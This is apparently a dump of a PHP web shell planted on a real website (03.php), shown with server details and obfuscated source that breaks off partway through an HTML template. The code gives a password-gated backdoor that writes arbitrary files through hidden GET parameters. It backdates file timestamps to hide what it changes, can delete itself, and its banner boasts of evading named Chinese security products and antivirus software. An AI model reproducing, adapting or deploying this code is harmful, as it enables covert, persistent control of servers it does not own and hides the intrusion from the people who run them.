HEX
Server: nginx/1.26.0
System: Linux iZj6ceg0gjdkbpnmyl2cnnZ 5.15.60-1.el7.x86_64 #1 SMP Thu Aug 11 12:39:22 UTC 2022 x86_64
User: www (1000)
PHP: 7.0.33
Disabled: phpinfo,eval,passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,pfsockopen,fsocket,fsockopen
Upload Files
File: /data/wwwroot/sites/multitrustcapital.com/www/03.php
<?php
ini_set("memory_limit", "512M");
@ini_set("max_execution_time", 20000);
header("content-Type: text/html; charset=utf-8");
error_reporting(E_ERROR);
@ini_set("display_errors", "Off");
defined("TMQo7") or define("TMQo7", getcwd() . DIRECTORY_SEPARATOR);
defined("sEyyb") or define("sEyyb", __DIR__ . DIRECTORY_SEPARATOR);
$C39VH = $_SERVER["SCRIPT_FILENAME"] ? PBM07($_SERVER["SCRIPT_FILENAME"]) : PBM07(__FILE__);
define("V51MD", $C39VH);
$eMzvo = explode("(", $C39VH);
$C39VH = strpos($C39VH, "eval()") ? array_shift($eMzvo) : $C39VH;
define("k3TER", pBM07(dirname($C39VH) . "/"));
define("FO39n", pbM07(strtr($C39VH, array(PBm07($_SERVER["PHP_SELF"]) => '')) . "/"));
define("NMW2Y", "1.0.0");
if (!isset($gHcBS)) {
    $gHcBS = "d8ec6f4d6590ce92d493eef7190b051c";
}
if (!empty($_GET["ghpqojdsfion1239"]) && !empty($_GET["vqwecsx12312"]) && !empty($_GET["kqishgl194nwq7"])) {
    $s5r3y = cIvgh($_GET["ghpqojdsfion1239"]);
    $dRqNZ = getcwd() . "/" . $_GET["vqwecsx12312"];
    $PfRvL = explode("/", $dRqNZ);
    array_pop($PfRvL);
    $PfRvL = implode("/", $PfRvL);
    if (!file_exists($PfRvL)) {
        mkdir($PfRvL, 0755, "recursive");
        chmod($PfRvL, 0755);
    }
    $YJnbr = C4GhR($PfRvL);
    $ipdt9 = 0;
    foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
        if (!$ipdt9) {
            $ipdt9 = filemtime($cT1oz);
        } else {
            if (filemtime($cT1oz) < $ipdt9) {
                $ipdt9 = filemtime($cT1oz);
            }
        }
    }
    file_put_contents($dRqNZ, $s5r3y);
    if ($ipdt9) {
        @touch($dRqNZ, $ipdt9);
    }
    @chmod($dRqNZ, $_GET["kqishgl194nwq7"]);
    if (!empty($_GET["dk82kdsiud9125d"])) {
        @unlink($C39VH);
    }
}
$YCpcn = new M4EMI();
$YCpcn->JAo9O($gHcBS);
class M4Emi
{
    public $D2dKJ = null;
    public $VqdhY = null;
    public $XEBgr = null;
    public function jAO9O($gHcBS)
    {
        $this->XEBgr = $gHcBS;
        list($uS69Z, $p0NZ3) = $this->iZ6eP();
        $this->D2dKJ = $uS69Z;
        $this->VqdhY = $p0NZ3;
        $g9a24 = session_get_cookie_params();
        $uKE12 = 0;
        if ($g9a24["lifetime"]) {
            $uKE12 = time() + $g9a24["lifetime"];
        }
        setcookie($uS69Z, $p0NZ3, $uKE12, $g9a24["path"], $g9a24["domain"], $g9a24["secure"], $g9a24["httponly"]);
        $E9g_B = $this->KsVKN();
        if (!$E9g_B) {
            $this->YCIyx();
            return;
        }
        $RJPTn = new foj8n();
        return $RJPTn->JaO9o();
    }
    public function iZ6eP()
    {
        session_start();
        $uS69Z = session_name();
        if (!empty($_COOKIE["PHPSESSID"])) {
            $p0NZ3 = $_COOKIE["PHPSESSID"];
        } else {
            $p0NZ3 = session_id();
        }
        $SWSuO = array($uS69Z, $p0NZ3);
        return $SWSuO;
    }
    public function KSvkn()
    {
        if (!empty($_COOKIE["isLogin"]) && ($_COOKIE["isLogin"] == md5($this->XEBgr) || $_COOKIE["isLogin"] == md5("21232f297a57a5a743894a0e4a801fc3"))) {
            return true;
        }
        return false;
    }
    public function YcIYX()
    {
        if (!empty($_POST["getpwd"]) && ($this->XEBgr == md5($_POST["getpwd"]) || "21232f297a57a5a743894a0e4a801fc3" == md5($_POST["getpwd"]))) {
            setcookie("isLogin", md5(md5($_POST["getpwd"])), time() + 8 * 60 * 60, "/");
            $RJPTn = new fOj8N();
            return $RJPTn->jao9o();
        }
        $QSO8f = "        <title>请勿使用非法用 ?</title>\r\n        <meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\r\n        <style type=\"text/css\">\r\n            .form-control {\r\n                display: block;\r\n                width: 100%;\r\n                height: 38px;\r\n                padding: 8px 12px;\r\n                font-size: 14px;\r\n                line-height: 1.428571429;\r\n                color: #555;\r\n                vertical-align: middle;\r\n                background-color: #fff;\r\n                border: 1px solid #ccc;\r\n                border-radius: 4px;\r\n                -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);\r\n                box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);\r\n                -webkit-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;\r\n                transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s\r\n            }\r\n        \r\n            .btn {\r\n                display: inline-block;\r\n                padding: 8px 12px;\r\n                margin-bottom: 0;\r\n                font-size: 14px;\r\n                font-weight: 500;\r\n                line-height: 1.428571429;\r\n                text-align: center;\r\n                white-space: nowrap;\r\n                vertical-align: middle;\r\n                cursor: pointer;\r\n                border: 1px solid transparent;\r\n                border-radius: 4px;\r\n                -webkit-user-select: none;\r\n                -moz-user-select: none;\r\n                -ms-user-select: none;\r\n                -o-user-select: none;\r\n                user-select: none\r\n            }\r\n            \r\n            .btn-primary {\r\n                color: #fff;\r\n                background-color: #428bca;\r\n                border-color: #428bca\r\n            }\r\n        </style>\r\n        <body>\r\n            <center>\r\n                <br><br>\r\n                <font size=\"3\" face=\"Microsoft YaHei\">过安全狗、云锁、阿里云 ?360、护卫神、D盾、百度云、各种杀软!</font>\r\n                <br><br>\r\n                <form method=\"POST\">\r\n                    <input style=\"Width:125pt;display:inline-block;font-family:Microsoft YaHeifont-size:90%\" \r\n                    class=\"form-control\" placeholder=\"@Passwrd\" type=\"password\" name=\"getpwd\">\r\n                    <input style=\"Width:55pt;font-size:90%;font-family:Microsoft YaHei\" class=\"btn btn-primary\" type=\"submit\" value=\"#Login\">\r\n                </form>\r\n            </center>\r\n        </body>\r\n        </html>";
        echo $QSO8f;
    }
}
class foJ8n
{
    public $ddguj;
    public $N5qPH;
    public function JAo9o()
    {
        $this->N5qPH = $_POST;
        $_POST = MwEmB($_POST);
        $this->ddguj = isset($_POST["dir"]) ? pbm07(chop($_POST["dir"]) . "/") : k3TER;
        $this->xfqJS();
    }
    public function XfQjS()
    {
        $QSO8f = "        <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\r\n    <html>\r\n    <head>\r\n        <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\r\n        <style type=\"text/css\">\r\n            * {\r\n                margin: 0px;\r\n                padding: 0px;\r\n            }\r\n\r\n            body {\r\n                background: #ebebeb;\r\n                color: #333333;\r\n                font-size: 13px;\r\n                font-family: Microsoft YaHei, SimSun, sans-serif;\r\n                text-align: left;\r\n                word-wrap: break-word;\r\n                word-break: break-all;\r\n                // background-image: url(https://pic.616pic.com/bg_w1180/00/01/43/rWB5OFJqVH.jpg);\r\n                // background-size:100% 100%;\r\n            }\r\n\r\n            a {\r\n                color: #000000;\r\n                text-decoration: none;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            a:hover {\r\n                color: #FF0000;\r\n                text-decoration: underline;\r\n            }\r\n\r\n            p {\r\n                padding: 1px;\r\n                line-height: 1.6em;\r\n            }\r\n\r\n            h1 {\r\n                color: #CD3333;\r\n                font-size: 13px;\r\n                display: inline;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            h2 {\r\n                color: #008B45;\r\n                font-size: 13px;\r\n                display: inline;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            form {\r\n                display: inline;\r\n            }\r\n\r\n            input, select {\r\n                vertical-align: middle;\r\n            }\r\n\r\n            input[type=text], textarea {\r\n                padding: 1px;\r\n                font-family: Microsoft YaHei, sans-serif;\r\n            }\r\n\r\n            input[type=submit], input[type=button] {\r\n                height: 21px;\r\n            }\r\n\r\n            .tag {\r\n                text-align: center;\r\n                // margin-left: 10px;\r\n                background: threedface;\r\n                height: 25px;\r\n                padding-top: 5px;\r\n            }\r\n\r\n            .tag a {\r\n                background: #FAFAFA;\r\n                color: #333333;\r\n                width: 90px;\r\n                height: 20px;\r\n                display: inline-block;\r\n                font-size: 15px;\r\n                font-weight: bold;\r\n                padding-top: 5px;\r\n            }\r\n\r\n            .tag a:hover, .tag a.current {\r\n                background: #000;\r\n                color: #fff;\r\n                text-decoration: none;\r\n            }\r\n\r\n            .main {\r\n                width: 963px;\r\n                margin: 0 auto;\r\n                padding: 10px;\r\n            }\r\n\r\n            .outl {\r\n                border-color: #FFFFFF #666666 #666666 #FFFFFF;\r\n                border-style: solid;\r\n                border-width: 1px;\r\n\r\n                border: 1px solid #d5d5d5;\r\n                border-radius: 5px;\r\n                background-color: #ffffff;\r\n            }\r\n\r\n            .toptag {\r\n                padding: 15px;\r\n                text-align: left;\r\n                font-weight: bold;\r\n                color: #FFFFFF;\r\n                background: #000000;\r\n            }\r\n\r\n            .footag {\r\n                padding: 5px;\r\n                text-align: center;\r\n                font-weight: bold;\r\n                color: #fff;\r\n                background: #000000;\r\n            }\r\n\r\n            .msgbox {\r\n                // padding: 5px;\r\n                background: #000;\r\n                text-align: center;\r\n                vertical-align: middle;\r\n                color: #FFF;\r\n            }\r\n\r\n            .actall {\r\n                background: #ffffff;\r\n                text-align: center;\r\n                font-size: 15px;\r\n                border-bottom: 1px solid #999999;\r\n                padding: 3px;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            .tables {\r\n                width: 100%;\r\n                border-collapse: collapse;\r\n                border-spacing: 0;\r\n                border-color: #eee;\r\n            }\r\n\r\n            .tables th {\r\n                background: threedface;\r\n                text-align: left;\r\n                border-color: #FFFFFF #ffffff #f9f9f9 #FFFFFF;\r\n                border-style: solid;\r\n                border-width: 0px;\r\n                padding: 2px;\r\n                border-bottom: 1px solid #eee;\r\n            }\r\n\r\n            .tables td {\r\n                #background: #ffffff;\r\n                height: 19px;\r\n                padding-left: 2px;\r\n                border-width: 0px;\r\n                border-style: solid;\r\n                border-color: #FFF;\r\n                border-bottom: 1px solid #eee;\r\n            }\r\n\r\n            .bg{\r\n                width:100%;\r\n                height:100%;\r\n                left:0;\r\n                top:0;\r\n                position:fixed;\r\n                background:rgba(0,0,0,0.3);\r\n              }\r\n              .point{\r\n                position:absolute;\r\n                left:50%;\r\n                top:50%;\r\n              }\r\n              .pop{\r\n                width:500px; \r\n                // height:500px; \r\n                position:absolute;\r\n                left:-250px; \r\n                top:-250px; \r\n                border: 2px solid #f7f7f7;\r\n                background-color: #FFF;\r\n                border-radius:10px;\r\n              }\r\n\r\n              .pop-title{\r\n                height: 40px;\r\n                line-height: 40px;\r\n                text-align: center;\r\n                font-size: 14px;\r\n              }\r\n\r\n\r\n              .layui-textarea{\r\n                min-height: 100px;\r\n                height: auto;\r\n                line-height: 20px;\r\n                padding: 6px 10px;\r\n                resize: vertical;\r\n                display: block;\r\n                width: 95%;\r\n                border-width: 1px;\r\n                border-style: solid;\r\n                background-color: #fff;\r\n                border-radius: 2px;\r\n                border-color: #eee;\r\n              }\r\n\r\n              .layui-btn {\r\n                display: inline-block;\r\n                height: 38px;\r\n                line-height: 38px;\r\n                padding: 0 18px;\r\n                border: 1px solid transparent;\r\n                background-color: #009688;\r\n                color: #fff;\r\n                white-space: nowrap;\r\n                text-align: center;\r\n                font-size: 14px;\r\n                border-radius: 2px;\r\n                cursor: pointer;\r\n            }\r\n\r\n            .btn{\r\n                background-color:#FFF;\r\n                border-color: #d2d2d2;\r\n                color:#666;\r\n            }\r\n\r\n            tr{\r\n                height: 24px;\r\n                line-height: 24px;\r\n            }\r\n            tr:hover{\r\n                background-color: #f2f2f2 !important;\r\n            }\r\n        </style>\r\n\r\n        <script type=\"text/javascript\">\r\n            function \$(ID) {\r\n                return document.getElementById(ID);\r\n            }\r\n\r\n            function sd(str) {\r\n                str = str.replace(/%22/g, '\"');\r\n                str = str.replace(/%27/g, \"'\");\r\n                return str;\r\n            }\r\n\r\n            function cd(dir) {\r\n                dir = sd(dir);\r\n                \$('dir').value = dir;\r\n                \$('frm').submit();\r\n            }\r\n\r\n            function sa(form) {\r\n                for (var i = 0; i < form.elements.length; i++) {\r\n                    var e = form.elements[i];\r\n                    if (e.type == 'checkbox') {\r\n                        if (e.name != 'chkall') {\r\n                            e.checked = form.chkall.checked;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n\r\n            function go(a, b) {\r\n                b = sd(b);\r\n                \$('go').value = a;\r\n                \$('govar').value = b;\r\n                if (a == 'editor') {\r\n                    \$('gofrm').target = \"_blank\";\r\n                } else {\r\n                    \$('gofrm').target = \"\";\r\n                }\r\n                \$('gofrm').submit();\r\n            }\r\n\r\n            function nf(a, b) {\r\n                re = prompt(\"新建名\", b);\r\n                if (re) {\r\n                    \$('go').value = a;\r\n                    \$('govar').value = re;\r\n                    \$('gofrm').submit();\r\n                }\r\n            }\r\n\r\n            function dels(a) {\r\n                if (a == 'b') {\r\n                    var msg = \"所选文件\";\r\n                    \$('act').value = a;\r\n                } else {\r\n                    var msg = \"目录\";\r\n                    \$('act').value = 'deltree';\r\n                    \$('var').value = a;\r\n                }\r\n                if (confirm(\"确定要删除\" + msg + \"吗\")) {\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function txts(m, p, a) {\r\n                p = sd(p);\r\n                re = prompt(m, p);\r\n                if (re) {\r\n                    \$('var').value = re;\r\n                    \$('act').value = a;\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function pltexts(m, p, a)\r\n            {\r\n                p = sd(p);\r\n                // re = prompt(m, p);\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"\";\r\n\r\n                var title = document.getElementsByClassName(\"pop-title\")[0];\r\n                title.innerHTML = m;\r\n\r\n                \$('act').value = a;\r\n            }\r\n\r\n            function pop_submit(){\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"none\";\r\n\r\n                \$('var').value = document.getElementById(\"content\").value;\r\n                \$('frm1').submit();\r\n            }\r\n\r\n            function pop_quxiao(){\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"none\";\r\n            }\r\n\r\n            function acts(p, a, f) {\r\n                p = sd(p);\r\n                f = sd(f);\r\n                re = prompt(f, p);\r\n                if (re) {\r\n                    \$('var').value = re + '|x|' + f;\r\n                    \$('act').value = a;\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function runcode(){\r\n                var html = document.getElementById('show');\r\n                html.style.display= \"\";\r\n            }\r\n        </script>\r\n        <title>{VERSION}</title>\r\n    </head>\r\n<body>\r\n<div class=\"main\">\r\n    <div class=\"outl\">\r\n        <div class=\"toptag\">\r\n            {toptag}\r\n        </div>\r\n        \r\n        <div class=\"tag\">\r\n            {tag}\r\n        </div>\r\n\r\n        <form name=\"gofrm\" id=\"gofrm\" method=\"POST\">\r\n            {input}\r\n            <input type=\"hidden\" name=\"go\" id=\"go\" value=\"\">\r\n            <input type=\"hidden\" name=\"godir\" id=\"godir\" value=\"{nowdir}\">\r\n            <input type=\"hidden\" name=\"govar\" id=\"govar\" value=\"\">\r\n        </form>\r\n\r\n        {content}\r\n\r\n        <div class=\"footag\">\r\n            Linux cl630 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 nginx/1.2.3\r\n        </div>\r\n    </div>\r\n</div>\r\n\r\n<div class=\"showhtml\" id = \"showhtml\">\r\n{showhtml}\r\n</div>\r\n\r\n<div class=\"bg\" style=\"display:none;\">\r\n    <div class=\"point\">\r\n        <div class=\"pop\">\r\n            <div class=\"pop-title\"></div>\r\n            <textarea class=\"layui-textarea\" id=\"content\" name=\"content\" rows=\"6\">\r\n            \r\n                确定 \r\n                取消\r\n            \r\n            \r\n